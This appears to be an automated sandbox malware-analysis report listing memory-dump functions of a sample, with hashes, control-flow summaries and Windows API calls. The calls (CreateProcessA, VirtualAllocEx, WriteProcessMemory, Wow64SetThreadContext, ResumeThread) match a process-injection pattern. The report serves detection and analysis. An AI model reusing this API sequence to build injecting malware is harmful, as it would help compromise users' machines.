                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 9df1cd9c84a6db17b5d69cebfe63de6cb9261bfd4ecfa89d822a43380bc77f3f
                                                                                                                                                    • Instruction ID: 0a88495eb0faee7f1dd8f7f0853e09318f70c95b095e26dd962b197431cfbd01
                                                                                                                                                    • Opcode Fuzzy Hash: 9df1cd9c84a6db17b5d69cebfe63de6cb9261bfd4ecfa89d822a43380bc77f3f
                                                                                                                                                    • Instruction Fuzzy Hash: D4B24B7054D385AFD7139B78CC59BAA3FB8AF47700F1904DAE540DB2E2D2685849CB72
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2459 1e1e88-1e1f51 call 1e1214 call 1e1224 call 1e1234 call 1e1244 2477 1e1f56-1e1f84 2459->2477 2481 1e1f8f 2477->2481 2482 1e1f86 2477->2482 2482->2481
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Tep$Tep
                                                                                                                                                    • API String ID: 0-347264811
                                                                                                                                                    • Opcode ID: 1358a8d95339ab71ee6d24de46501dcdb0627d1e25e310d5f52184c4c244ce93
                                                                                                                                                    • Instruction ID: daa5265b347963c950db33be17d5d9af86f123bfe4d9ff694fd018b04f8ca528
                                                                                                                                                    • Opcode Fuzzy Hash: 1358a8d95339ab71ee6d24de46501dcdb0627d1e25e310d5f52184c4c244ce93
                                                                                                                                                    • Instruction Fuzzy Hash: 39318130B10255AFCB18EFA9D495AADBBF6AF88310F25446DE006EB391CF759C05CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2552 1f15480-1f15487 2553 1f15c1b-1f15c2d call 58c9298 2552->2553 2554 1f1548d-1f15494 2552->2554 2555 1f15c32-1f15c57 call 1f13fb8 2553->2555 2554->2553 2558 1f15c5d-1f15c65 2555->2558 2559 1f151ef-1f151f7 2555->2559 2558->2559 2560 1f15200-1f16d7c 2559->2560 2561 1f151f9 2559->2561 2563 1f16d82-1f16d8a 2560->2563 2564 1f16ade-1f16b0f 2560->2564 2561->2560 2563->2559 2567 1f16b11-1f16b36 call 1f15050 2564->2567 2568 1f16b4c-1f16b57 2564->2568 2567->2559 2571 1f16b3c-1f16b44 2567->2571 2568->2559 2571->2559
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 9$e
                                                                                                                                                    • API String ID: 0-415986556
                                                                                                                                                    • Opcode ID: 4b4a73645fda932c01561538f4b23bc5a3d25c453cf9095d82b3e3bcf8d472dc
                                                                                                                                                    • Instruction ID: 86104f654ddb2e3c07e82716df7bede1fd8d2ac90fc7d9aed7cf657908ae79db
                                                                                                                                                    • Opcode Fuzzy Hash: 4b4a73645fda932c01561538f4b23bc5a3d25c453cf9095d82b3e3bcf8d472dc
                                                                                                                                                    • Instruction Fuzzy Hash: 23F0F470D06218CFDB22DFA8C4887DCBBB1FB4A310F501199D41AB2259C3361A85CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2573 1f15764-1f15770 2591 1f15773 call 1f173a0 2573->2591 2592 1f15773 call 1f1734f 2573->2592 2574 1f15779-1f157b0 call 1f15050 2577 1f157b6-1f157be 2574->2577 2578 1f151ef-1f151f7 2574->2578 2577->2578 2579 1f15200-1f16d7c 2578->2579 2580 1f151f9 2578->2580 2582 1f16d82-1f16d8a 2579->2582 2583 1f16ade-1f16b0f 2579->2583 2580->2579 2582->2578 2586 1f16b11-1f16b36 call 1f15050 2583->2586 2587 1f16b4c-1f16b57 2583->2587 2586->2578 2590 1f16b3c-1f16b44 2586->2590 2587->2578 2590->2578 2591->2574 2592->2574
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $y
                                                                                                                                                    • API String ID: 0-524138444
                                                                                                                                                    • Opcode ID: 99c22e72c4a0b550a5514f34a08482e317f830c749c24e7bfe57879f803e9dbf
                                                                                                                                                    • Instruction ID: 2131725e4776722d822b2c99fe1e205e2c7ea7e16271a7754ac38510ed38db9c
                                                                                                                                                    • Opcode Fuzzy Hash: 99c22e72c4a0b550a5514f34a08482e317f830c749c24e7bfe57879f803e9dbf
                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0AA74D01229CFDB22DF64C888BDCBBB0BB4A311F5081EAD81DB2254D3365A808F45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,p
                                                                                                                                                    • API String ID: 0-2091407873
                                                                                                                                                    • Opcode ID: ccf1005b66769bc05ae6ef13cf793c9823f2f58cd094d214bf646cb1faca2827
                                                                                                                                                    • Instruction ID: cb7c2556b9de34da6b22c5dbbda8c4064b7c4af4ef06a14a7b1fc6c027775886
                                                                                                                                                    • Opcode Fuzzy Hash: ccf1005b66769bc05ae6ef13cf793c9823f2f58cd094d214bf646cb1faca2827
                                                                                                                                                    • Instruction Fuzzy Hash: 66521975A002289FDB69CF68C941BDDBBF2BF88300F1541D9E909A7356DA319E81CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (_p
                                                                                                                                                    • API String ID: 0-2702063464
                                                                                                                                                    • Opcode ID: 3623c1ce53becebf97c52870d629c4d7985d232ddcf8a6aed00fab13c3ae0ff1
                                                                                                                                                    • Instruction ID: ed2737a7133a4b17a0bf5e49aa5e77b0e3693ce1b0a5e3716666eff008fb0352
                                                                                                                                                    • Opcode Fuzzy Hash: 3623c1ce53becebf97c52870d629c4d7985d232ddcf8a6aed00fab13c3ae0ff1
                                                                                                                                                    • Instruction Fuzzy Hash: 67226B35B40605DFDB18DFA8C490AADB7B2BF88310F158169E906DB3A5EB72ED41CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01F0742F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 1044e5828198b32f1dabd10944a8d3093144bcbee58b2307a06f452296835d13
                                                                                                                                                    • Instruction ID: a2667105c4358a4b04f7ec1de428f2270c8c0eb4f3c3bee316a9f1e8220abcb9
                                                                                                                                                    • Opcode Fuzzy Hash: 1044e5828198b32f1dabd10944a8d3093144bcbee58b2307a06f452296835d13
                                                                                                                                                    • Instruction Fuzzy Hash: 23A112B0D00219CFDF21DFA9C8457EEBBB1BF49310F1492A9E898A7280DB759985DF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 01F0742F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 963392458-0
                                                                                                                                                    • Opcode ID: 80e49af5810b445b26adbee100302d36880cdcae0a0f8092cb6fd9864d348a1f
                                                                                                                                                    • Instruction ID: c9dc6cabd8d84987b970c634172a22415b5cca8a98b8797a4bfe39e4b757c211
                                                                                                                                                    • Opcode Fuzzy Hash: 80e49af5810b445b26adbee100302d36880cdcae0a0f8092cb6fd9864d348a1f
                                                                                                                                                    • Instruction Fuzzy Hash: 35A123B0D00219CFDF21DFA9C8457EEBBF1BB09310F1492A9E898A7280DB759985DF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $p
                                                                                                                                                    • API String ID: 0-982128392
                                                                                                                                                    • Opcode ID: 693ed3d5d9f637471c334bc3b7043b4de77c9d55583f6736cb71246810786a32
                                                                                                                                                    • Instruction ID: 653d1b4b7d850dc308561906511db1ab5c8eae5f248d064dc357c5aa4288257b
                                                                                                                                                    • Opcode Fuzzy Hash: 693ed3d5d9f637471c334bc3b7043b4de77c9d55583f6736cb71246810786a32
                                                                                                                                                    • Instruction Fuzzy Hash: 0DF1A271B002128FDB28DF29C41566EBBE2EF84310F14452AE996CB3E9DB35CD4ACB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01F07F88
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: cd0c639d7f8fc0317c59728b9e06f0d10bbbbe5f33db94fd5d9501d4c2da355f
                                                                                                                                                    • Instruction ID: dd59e8ec521c0b15e8519ed4af2c60a610f52f328dd021ec49000d5cc6df2065
                                                                                                                                                    • Opcode Fuzzy Hash: cd0c639d7f8fc0317c59728b9e06f0d10bbbbe5f33db94fd5d9501d4c2da355f
                                                                                                                                                    • Instruction Fuzzy Hash: 5241BAB5D012589FCF10CFA9D984AEEFBF1FB49314F20942AE814B7250D335AA45CB94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 01F07F88
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                                    • Opcode ID: 903283fc15d067a78316a4603cddebe4d3454ef92a162b8d140024698161bf54
                                                                                                                                                    • Instruction ID: 03a5dd5fc09d025ec73e51b2257027138165036de14352ebdd52a166ff29d6ef
                                                                                                                                                    • Opcode Fuzzy Hash: 903283fc15d067a78316a4603cddebe4d3454ef92a162b8d140024698161bf54
                                                                                                                                                    • Instruction Fuzzy Hash: 9541AAB5D012589FCF00CFA9D984AEEFBF1AB49314F24942AE814B7250D335AA45DBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 01F07CA2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: acf65c4e39c3c16f2a54fb14d55846b4a03a627db6da850114ea32956d3a5c04
                                                                                                                                                    • Instruction ID: 399352ebd81abeab4fc7c9c9369044d73fbf3c5758faa68db9875101b7dfc106
                                                                                                                                                    • Opcode Fuzzy Hash: acf65c4e39c3c16f2a54fb14d55846b4a03a627db6da850114ea32956d3a5c04
                                                                                                                                                    • Instruction Fuzzy Hash: 283187B9D002589FCF10CFA9D984AAEFBB5BB49310F10942AE814B7250D735A945CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04C8DB5C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: 43191390eb12eed4a5d2aa57b3d994ff58c3f74baacc4afd25c78101e693245c
                                                                                                                                                    • Instruction ID: c9ef7440133cff8dafe7cac8b19c02b141953d0338b1e665d9a957a17fc6f745
                                                                                                                                                    • Opcode Fuzzy Hash: 43191390eb12eed4a5d2aa57b3d994ff58c3f74baacc4afd25c78101e693245c
                                                                                                                                                    • Instruction Fuzzy Hash: 6C31A9B4D002089FCF10CFA9D984AEEFBB1EF49314F24942AE815B7214D735A945CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01F07627
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                                    • Opcode ID: 74619949482366c8a17da8d5b9473fb36398aa255ad9e8f12a2186553c73837e
                                                                                                                                                    • Instruction ID: 02cbd2869fe568ee677270df790ac9b5dc2792691e338c47e8a8b0ea5fd64588
                                                                                                                                                    • Opcode Fuzzy Hash: 74619949482366c8a17da8d5b9473fb36398aa255ad9e8f12a2186553c73837e
                                                                                                                                                    • Instruction Fuzzy Hash: 9E31BBB5D002589FCB10DFAAD984AEEFFF1AF49314F24806AE415B7240D739A949CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: 5ba190180c0cb8cc583a6d5ae7cda506680af890a54ab83570fe4f8759ecef14
                                                                                                                                                    • Instruction ID: 2295b4274dd6ab068b723d7472dfee38789a45b9a700efe6259fbb8c052f5711
                                                                                                                                                    • Opcode Fuzzy Hash: 5ba190180c0cb8cc583a6d5ae7cda506680af890a54ab83570fe4f8759ecef14
                                                                                                                                                    • Instruction Fuzzy Hash: 4331CCB4D002189FCF14CFA9D984AEEFBB1AF49320F24942AE815B7350C735A905CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356459108.0000000001F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F00000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f00000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ResumeThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                                    • Opcode ID: e561e1f0a290bf223c4ba8ad55156eb7460554e23dbe7518922b33bc628a4d82
                                                                                                                                                    • Instruction ID: ba4f2e193606ea68f3b78253bf698eae024272cafeb32dd6412c9822b1ff3eca
                                                                                                                                                    • Opcode Fuzzy Hash: e561e1f0a290bf223c4ba8ad55156eb7460554e23dbe7518922b33bc628a4d82
                                                                                                                                                    • Instruction Fuzzy Hash: 3E31CCB4D002089FCF10CFA9D984AEEFBB5AF49310F10942AE814B7350C735A905CF64
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: d9fc883e5ed52a0b911229a37e6c750a426f1a772f57d41f3f380c0e31693fa0
                                                                                                                                                    • Instruction ID: c31ea6109f287e33c476fbb2d81ecfafa0782c60e1807ac28ecbcd35707aa53d
                                                                                                                                                    • Opcode Fuzzy Hash: d9fc883e5ed52a0b911229a37e6c750a426f1a772f57d41f3f380c0e31693fa0
                                                                                                                                                    • Instruction Fuzzy Hash: 60A10234A10619DFDB14EFA4D898A9DB7B2FF88300F158159E505AB369DB71EC46CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Plp
                                                                                                                                                    • API String ID: 0-2701032082
                                                                                                                                                    • Opcode ID: 7220086d66e9184c67773defd236ec947791cba1f217df75de89a1d5e02dbf7d
                                                                                                                                                    • Instruction ID: 5c89b01f486f032a65a5935ce48b53f0ccf218673c297a91555ea7f28f809cc7
                                                                                                                                                    • Opcode Fuzzy Hash: 7220086d66e9184c67773defd236ec947791cba1f217df75de89a1d5e02dbf7d
                                                                                                                                                    • Instruction Fuzzy Hash: DF61F2347006048FDB09DF68C898AAE7BF2AF89705F2540A9E505CB3B5DB71EC42CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: cb38f55c7b6e2e6360fa1f96b5bc1176d9c28e42ce39939c03d5a7328bf7c9e3
                                                                                                                                                    • Instruction ID: 09cff83a20657e0d497c6ca1166f0f2f3dd7bc53659bab94fc2ae29a4e3d4db0
                                                                                                                                                    • Opcode Fuzzy Hash: cb38f55c7b6e2e6360fa1f96b5bc1176d9c28e42ce39939c03d5a7328bf7c9e3
                                                                                                                                                    • Instruction Fuzzy Hash: 5251F331A006168FCB00DF68C484AAAFBB1FF85324B2586AAE615DB341D730FC56CBD0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: pp
                                                                                                                                                    • API String ID: 0-2116140168
                                                                                                                                                    • Opcode ID: 34dd27f26636ceb3e79c2d177c39c35dc4a52832f0284a42e92855ae7bc13dbd
                                                                                                                                                    • Instruction ID: 2f4f3c9120911217c09f09876cc178f0836107b8228847961d21d49279c327f9
                                                                                                                                                    • Opcode Fuzzy Hash: 34dd27f26636ceb3e79c2d177c39c35dc4a52832f0284a42e92855ae7bc13dbd
                                                                                                                                                    • Instruction Fuzzy Hash: 8E513E76600100AFCB499FA8D905D297BB7FF8C31471A81D9F2099B376DA36DC21DB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: TJp
                                                                                                                                                    • API String ID: 0-1978589728
                                                                                                                                                    • Opcode ID: 0adb618515594efbafcec4c667f89b4b74e1e6efcc1d9d82515bd91e04d5bb49
                                                                                                                                                    • Instruction ID: ce483aff482c31b359c8704f1139e75ecdcc10e464ea6dc95c5543313238ea32
                                                                                                                                                    • Opcode Fuzzy Hash: 0adb618515594efbafcec4c667f89b4b74e1e6efcc1d9d82515bd91e04d5bb49
                                                                                                                                                    • Instruction Fuzzy Hash: 6F510274E00248DFEB14DFA9D8586EDBBB1FF89300F20806AE416A73A4DB385A55CF15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 211787eb14c2b95b7f76c28269d4e30b55ad1f70bc8c1d6a82d69214e3241ef1
                                                                                                                                                    • Instruction ID: 171d9b8c63f8e8e5ab81a84ce8778bb55d24984be2048276618ab2ad75944570
                                                                                                                                                    • Opcode Fuzzy Hash: 211787eb14c2b95b7f76c28269d4e30b55ad1f70bc8c1d6a82d69214e3241ef1
                                                                                                                                                    • Instruction Fuzzy Hash: 15419130B106159FCB19EB68C8A4A6EB7B7AFD8700F10441DE507AB3A8CF759C46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: TJp
                                                                                                                                                    • API String ID: 0-1978589728
                                                                                                                                                    • Opcode ID: 1ac13184da6d5b189501b7691365800d5969e96a9896c0daa60460fb55653bb1
                                                                                                                                                    • Instruction ID: 259b1d25db7245a8b6c3e89a96fb6fb3ebe3310ec46d9b39a1775b56115a10ad
                                                                                                                                                    • Opcode Fuzzy Hash: 1ac13184da6d5b189501b7691365800d5969e96a9896c0daa60460fb55653bb1
                                                                                                                                                    • Instruction Fuzzy Hash: D051F374E01208DFDB14DFA8E844AADBBB1FF49300F2080AAE416A7365DB355A55CF55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: TJp
                                                                                                                                                    • API String ID: 0-1978589728
                                                                                                                                                    • Opcode ID: 515b15c0436afcc9b1103ffaac299a3ee3dd3efb66be218772d5ed1dd33a3124
                                                                                                                                                    • Instruction ID: 717af4ad2780086b7c05db2d77a142f41b81b21fea12ccac7d264941102a18ba
                                                                                                                                                    • Opcode Fuzzy Hash: 515b15c0436afcc9b1103ffaac299a3ee3dd3efb66be218772d5ed1dd33a3124
                                                                                                                                                    • Instruction Fuzzy Hash: 2551D074E00208DFDB14DFA9D8586EDBBB1FF89300F20806AE816A7364DB745A55CF55
